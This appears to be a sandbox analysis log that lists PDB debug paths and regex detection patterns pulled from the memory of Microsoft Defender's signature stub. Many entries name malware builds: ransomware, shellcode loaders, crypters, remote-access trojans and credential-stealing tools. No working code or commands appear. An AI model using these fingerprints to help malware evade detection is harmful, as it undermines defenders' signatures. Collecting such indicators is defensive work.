Source:	Binary string: C:\\Users\\john\\Documents\\Visual Studio 2008\\Projects\\EncryptFile.\\.\\EncryptFile.exe.pdb source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp
Source:	Binary string: \DownloaderMain\DownloaderDll.pdb source: MpSigStub.exe, 00000026.00000003.18333419968.00000138BCD37000.00000004.00000001.sdmp
Source:	Binary string: megasync.pdb source: MpSigStub.exe, 00000026.00000003.18345142336.00000138BCDE5000.00000004.00000001.sdmp
Source:	Binary string: \\wininet_fr_20200212\\.+\\?dlln\.pdb source: MpSigStub.exe, 00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp
Source:	Binary string: msoert2.pdb3 source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp
Source:	Binary string: (vbsedit_source\x64\Release\mywscript.pdb source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp
Source:	Binary string: csgoInjector.pdb source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdb source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp
Source:	Binary string: \output\MinSizeRel\updrem.pdb] source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp
Source:	Binary string: kernel32.pdb source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp
Source:	Binary string: x:\Dev_CPP\Work\VS_KnzStr_Adware\Release\VS_Work1.pdbx source: MpSigStub.exe, 00000026.00000003.18326026778.00000138BCBB8000.00000004.00000001.sdmp
Source:	Binary string: \\WOO\\HT\\.+Server.+\.pdb source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp
Source:	Binary string: winscard.pdb source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp
Source:	Binary string: stscast.pdb source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp
Source:	Binary string: bin\Release\LiveUpdateWPP.pdbxd source: MpSigStub.exe, 00000026.00000003.18343744956.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: ^shell\BATLE_SOURCE\SampleService_run_shellcode_from-memory10-02-2016\Release\SampleService.pdb source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp
Source:	Binary string: \InstallGoogleToolBar\InstallGoogleToolBar\obj\Debug\InstallGoogleToolBar.pdb source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: \Release\shellcode.pdb source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp
Source:	Binary string: \Current\wear.pdb source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp
Source:	Binary string: PCSUQuickScan.pdb source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp
Source:	Binary string: hWEHW#@HJERKJERJER^$.Pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: e:\caoe.PDBa source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: mpengine.pdb source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp
Source:	Binary string: XrfZPp2C.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp
Source:	Binary string: UsoCoreWorker.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: Z:\\Work\\Make Troy\\Concealment Troy\\Exe_Concealment_Troy$Winlogon_Shell$\\.*.pdb source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp
Source:	Binary string: _sa\bin\Release\ClientSAHook.pdb source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp
Source:	Binary string: c:\To\In\All\With\Within\Value.pdb source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp
Source:	Binary string: security.pdb source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\w32tm\objfre\i386\w32tm.pdb0 source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp
Source:	Binary string: \\MoonRat_Develop\\.+\\obj\\Release\\.+\.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: \bin\Release.Minimal\officer.pdb source: MpSigStub.exe, 00000026.00000003.18309912138.00000138BE5E8000.00000004.00000001.sdmp
Source:	Binary string: C:\src\similar\clients\our\new_bundler\nsis_plugins\plugins\safed.pdb source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp
Source:	Binary string: unknowndll.pdbaT source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp
Source:	Binary string: LiuLiangBao\Release\LiuLiangBao.pdb source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp
Source:	Binary string: \InstallerMainV6_Yrrehs\Release\Main.pdb source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp
Source:	Binary string: adptif.pdb3 source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp
Source:	Binary string: :\cef_2883\chromium_git\chromium\src\out\Release_GN_x86\vmxclient.exe.pdb source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp
Source:	Binary string: D:\yo\chaos\Release\chaos.pdb source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp
Source:	Binary string: nafde.pdb source: MpSigStub.exe, 00000026.00000003.18343744956.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: .+\\WormWin32 Poenon.+\\.+.pdb source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp
Source:	Binary string: autofmt.pdb source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp
Source:	Binary string: PoolMonPlugin.pdb source: MpSigStub.exe, 00000026.00000003.18332668729.00000138BD2B0000.00000004.00000001.sdmp
Source:	Binary string: TuneUpUtilitiesApp32.pdb source: MpSigStub.exe, 00000026.00000003.18332668729.00000138BD2B0000.00000004.00000001.sdmp
Source:	Binary string: d:\pavbld\amcore\Signature\Source\sigutils\vdlls\Microsoft.NET\VFramework\mscorlib\mscorlib.pdb source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp
Source:	Binary string: \Projects\FlashPlayerPlugin\FlashPlayerPlugin\obj\Release\FlashPlayerPlugin.pdb source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp
Source:	Binary string: AWInstaller.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: HookPasswordReset.pdb source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp
Source:	Binary string: padcryptUninstaller\obj\Debug\padcryptUninstaller.pdb source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp
Source:	Binary string: PassView.pdb source: MpSigStub.exe, 00000026.00000003.18315521913.00000138BDDA8000.00000004.00000001.sdmp
Source:	Binary string: Ransom:MSIL/Cryptolocker.PDB!MTB source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp
Source:	Binary string: msoert2.pdb source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp
Source:	Binary string: I \\WOO\\HT\\AD_Attacker\\.+\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: D:\DevPatch\_FINAL\Bin\MapleStory.pdbx source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\finger\objfre\i386\finger.pdb source: MpSigStub.exe, 00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp
Source:	Binary string: dfsfgjfgdes.pdb source: MpSigStub.exe, 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp
Source:	Binary string: nanamnana\obj\Debug\nanamnana.pdbx source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp
Source:	Binary string: L6\\spam\\export_email_outlook\\cpp\\.*\\export..x\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: Qc:\users\mz\documents\visual studio 2013\Projects\Shellcode\Release\Shellcode.pdb] source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp
Source:	Binary string: \Release\initialexe\torch.exe.pdb source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: \Akl\kh\Release\kh.pdb source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp
Source:	Binary string: dsquery.pdb source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp
Source:	Binary string: \ExtractedBundle\RTM_ImageModRec_1.1.5.0_x64\RTM_ImageModRec.pdb source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp
Source:	Binary string: d:\workspace\ebclient\dmsetup\dmsched2\Release\dmsched2.pdbx source: MpSigStub.exe, 00000026.00000003.18310205090.00000138BE62A000.00000004.00000001.sdmp
Source:	Binary string: \\spam\\export_email_outlook\\cpp\\.*\\export..x\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: (d:\p\loser\a\a\objfre_wxp_x86\i386\A.pdb source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp
Source:	Binary string: dxva2.pdb3 source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp
Source:	Binary string: D:\code\ccminer\Release\x64\ccminer.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: obj\Debug\WinCalendar.pdb source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp
Source:	Binary string: D:\tortoiseSVN\nsc5\bin\Release\nssock2.pdbd source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp
Source:	Binary string: Qc:\users\mz\documents\visual studio 2013\Projects\Shellcode\Release\Shellcode.pdb source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp
Source:	Binary string: subst.pdb source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp
Source:	Binary string: \BaseFlash.pdb source: MpSigStub.exe, 00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp
Source:	Binary string: schtasks.pdbd source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp
Source:	Binary string: Win32\Release\Sdrsrv.pdb source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp
Source:	Binary string: Cryptor_noVSSnoPers.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: C:\mainProduct(old)\x86_bild_cryptor\shell_gen\Release\data_protect2.pdb source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: \Release\SSEngine.pdb source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86chk\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\lodctr\objchk\i386\lodctr.pdb source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp
Source:	Binary string: \tcrypt\Release\s_low.pdbx source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp
Source:	Binary string: \R980\Release\R980.pdb source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp
Source:	Binary string: P'Deamon-dll.*\\Release\\Deamon-dll\.pdb source: MpSigStub.exe, 00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp
Source:	Binary string: M(\\qbot_debugger\\.+\\qbot_debugger\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: KSLD.pdbGCTL source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp
Source:	Binary string: freefilesync_x64.pdb source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp
Source:	Binary string: \T+M\Result\DocPrint.pdb] source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp
Source:	Binary string: \13930308\Bot_70_FIX HEADER_FIX_LONGURL 73_StableAndNewProtocol - login all\Release\Bot.pdb source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp
Source:	Binary string: P)E:\\Production\\Tool-Developing\\.+\.pdb source: MpSigStub.exe, 00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp
Source:	Binary string: d:\74\55\Child\Require\bank\Bear\rather\66\Boy\front\special\straight\wood\1\guide.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: KSLD.pdb source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp
Source:	Binary string: \SecurityService\SecurityService\obj\Release\WindowsSecurityService.pdb source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: cryptdll.pdb source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp
Source:	Binary string: 2gerGW@4herhw*9283y4huWO.pdb] source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: reg.pdbd source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp
Source:	Binary string: D:\Projekty\EvulSoft\TibiSavePass\Programy\Stub VISUAL\Release\Stub VISUAL.pdb source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp
Source:	Binary string: !#HSTR:Win32/sfxrar.pdb.A source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp
Source:	Binary string: .+:\\.+\\.Pedro\\.PH_Secret_Application.\\PH_Secret_Application.\\.+\\Release\\.*.pdb source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp
Source:	Binary string: !6zyA6@267=HPS.C\|dMqd4-qaN\|yjm.pdb source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: eTiq_WaEN__y9F89zLukjmM.pdbx source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: @.pdb source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp
Source:	Binary string: \b\Ship\Win32\VideoProjectsLauncher\VideoProjectsLauncher.pdb source: MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp
Source:	Binary string: HSTR:Win32/sfxrar.pdb.A source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp
Source:	Binary string: vssadmin.pdb source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp
Source:	Binary string: ciTfDCxMQU0a5/DDEyGwn8ta.z4.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: r:\rel\iMS-srvreg56.pdb source: MpSigStub.exe, 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp
Source:	Binary string: 50G:\\combustion\\aiding\\breaching\\stooping.pdb source: MpSigStub.exe, 00000026.00000003.18301813906.00000138BCBCB000.00000004.00000001.sdmp
Source:	Binary string: msnetobj.pdb3 source: MpSigStub.exe, 00000026.00000003.18332878772.00000138BD2D2000.00000004.00000001.sdmp
Source:	Binary string: \Release\Cloudy.pdb] source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp
Source:	Binary string: lsasrv.pdb source: MpSigStub.exe, 00000026.00000003.18332668729.00000138BD2B0000.00000004.00000001.sdmp
Source:	Binary string: llq001\src\out\Official\UpdateChecker.exe.pdb source: MpSigStub.exe, 00000026.00000003.18338078941.00000138BD104000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-comm-l1-1-0.pdb source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp
Source:	Binary string: fA\\win\\build\\src\\build\\Release\\chrome_frame_helper\.exe\.pdb source: MpSigStub.exe, 00000026.00000003.18310798250.00000138BDEB0000.00000004.00000001.sdmp
Source:	Binary string: K8MiniPage.pdb source: MpSigStub.exe, 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp
Source:	Binary string: PELoader.pdb source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp
Source:	Binary string: _darkshell\i386\DarkShell.pdb] source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp
Source:	Binary string: Session.*\\Release\\GenIt\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: d:\\MODULOS\\PROJETO BATMAN\\Loaders\\Loader C# Crypter .* LINK .*\\obj\\x86\\Debug\\golfzinho.pdb source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: \Release\ProtectedService.pdb source: MpSigStub.exe, 00000026.00000003.18318585819.00000138BE41B000.00000004.00000001.sdmp
Source:	Binary string: msvfw32.pdb` source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp
Source:	Binary string: [cC]:\\Project(s)?\\ATLResDLL\\release\\AtlResDllR(es)?\.pdb source: MpSigStub.exe, 00000026.00000003.18310798250.00000138BDEB0000.00000004.00000001.sdmp
Source:	Binary string: \release\LSASecretsView.pdbx source: MpSigStub.exe, 00000026.00000003.18315521913.00000138BDDA8000.00000004.00000001.sdmp
Source:	Binary string: #CNC Plugins Tools\ProgFactory_d.pdb source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp
Source:	Binary string: SelfMother\SeaFriend\SmallStore\save.pdb source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp
Source:	Binary string: *.pdb.\|!\VstsGitSourceIndex.exe source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp
Source:	Binary string: \Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp
Source:	Binary string: F:\rdpscan\Bin\Release_logged\x64\rdpscan.pdb source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp
Source:	Binary string: 'D:\code\ccminer\Release\x64\ccminer.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: 4G:\Work\Bison\BisonNewHNStubDll\Release\Goopdate.pdb] source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: msvfw32.pdb source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp
Source:	Binary string: \FARATCLIENT\obj\Debug\FARATCLIENT.pdb source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp
Source:	Binary string: hal.pdb source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp
Source:	Binary string: JOe\|OBzjATck#psb/.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: \mspass.pdb source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp
Source:	Binary string: \bin\pxdl.pdb source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp
Source:	Binary string: D:\WorkObject\SupL_EnableBHO\BHOEnabler\bin\BHOEnabler.pdb source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp
Source:	Binary string: WirelessKeyView.pdb source: MpSigStub.exe, 00000026.00000003.18310205090.00000138BE62A000.00000004.00000001.sdmp
Source:	Binary string: i=[cC]:\\Project(s)?\\ATLResDLL\\release\\AtlResDllR(es)?\.pdb source: MpSigStub.exe, 00000026.00000003.18310798250.00000138BDEB0000.00000004.00000001.sdmp
Source:	Binary string: \SSFK\Release\SSFK.pdb source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp
Source:	Binary string: $\SuperLight\release\MfcDllServer.pdb source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: 3.C:\\Obnubilate\\Temp\\[a-z0-9]{26}\\Stub\.pdb source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp
Source:	Binary string: Release\adviser.pdb source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp
Source:	Binary string: <7\\Project's\\xCrypt3r\\stub_crypter\\Release\\stub.pdb source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: JJDownLoader\Bin\JJDownLoader_a.pdb source: MpSigStub.exe, 00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp
Source:	Binary string: \tutorial\Release\CoffeeShop6.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: iashlpr.pdb source: MpSigStub.exe, 00000026.00000003.18350786721.00000138BD66E000.00000004.00000001.sdmp
Source:	Binary string: \\fishmaster\\x64\\Release\\fishmaster\.pdb source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp
Source:	Binary string: ZAService.pdb source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp
Source:	Binary string: gMolq.pdb source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp
Source:	Binary string: O&\\wininet_fr_20200212\\.+\\?dlln\.pdb source: MpSigStub.exe, 00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp
Source:	Binary string: rStub\LimitlessLoggerStub\obj\x86\Debug\LLS.pdb source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp
Source:	Binary string: fk_drv.pdb] source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp
Source:	Binary string: RamMap.pdb source: MpSigStub.exe, 00000026.00000003.18332668729.00000138BD2B0000.00000004.00000001.sdmp
Source:	Binary string: C:\src\similar\clients\our\new_bundler\nsis_plugins\plugins\safed.pdbxm source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp
Source:	Binary string: c:\\Injekt - Builds\\.*\\SpeedBrowserP\\Source\\shortcut\\Encoder\\obj\\Release\\shortcut.pdb source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp
Source:	Binary string: 8rise\Window\position\Character\opposite\Miss\lawCome.pdb source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp
Source:	Binary string: aeroadmin.pdb source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp
Source:	Binary string: rpcss.pdb source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp
Source:	Binary string: \Release\UpdaterService.pdb source: MpSigStub.exe, 00000026.00000003.18318585819.00000138BE41B000.00000004.00000001.sdmp
Source:	Binary string: \Rasomware2.0.pdb source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp
Source:	Binary string: You\Above\Particular\Exception.pdb source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp
Source:	Binary string: \down\Wing\Would.pdb source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp
Source:	Binary string: mafia2injector\Release\MafiaInjector.pdb source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp
Source:	Binary string: \\aes_mfc\\Release\\aes_mfc.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: m3KHLMcF.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: sdmf\|er.pdb source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp
Source:	Binary string: \Release\TKCodeDDoS.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: Release\haozip.chs\bin\Win32\release\pdb\HaoZip7zSetup.pdb source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp
Source:	Binary string: F:\Projects\WebInject\bin\x86\Release_logged\payload32.pdb source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp
Source:	Binary string: CrossLoopService.pdb source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp
Source:	Binary string: \Release\winsrcsrv.pdb source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp
Source:	Binary string: hcd:\\MODULOS\\PROJETO BATMAN\\Loaders\\Loader C# Crypter .* LINK .*\\obj\\x86\\Debug\\golfzinho.pdb source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: G\SharedSerialization\obj\Release\netstandard2.0\SharedSerialization.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: ir41_qcx.pdb source: MpSigStub.exe, 00000026.00000003.18350786721.00000138BD66E000.00000004.00000001.sdmp
Source:	Binary string: dbmsrpcn.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: mciole32.pdb source: MpSigStub.exe, 00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp
Source:	Binary string: termsrv.pdbaA source: MpSigStub.exe, 00000026.00000003.18345142336.00000138BCDE5000.00000004.00000001.sdmp
Source:	Binary string: Deamon-dll.*\\Release\\Deamon-dll\.pdb source: MpSigStub.exe, 00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp
Source:	Binary string: irprops.pdbj source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp
Source:	Binary string: Pb730.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: \Release\NvBackend.pdbx source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp
Source:	Binary string: ReleaseDebug\TvServer.pdb source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp
Source:	Binary string: borlo 1.9.7 src\WindowsApplication1\obj\Debug\Winlogon.pdb source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp
Source:	Binary string: 0rStub\LimitlessLoggerStub\obj\x86\Debug\LLS.pdb source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp
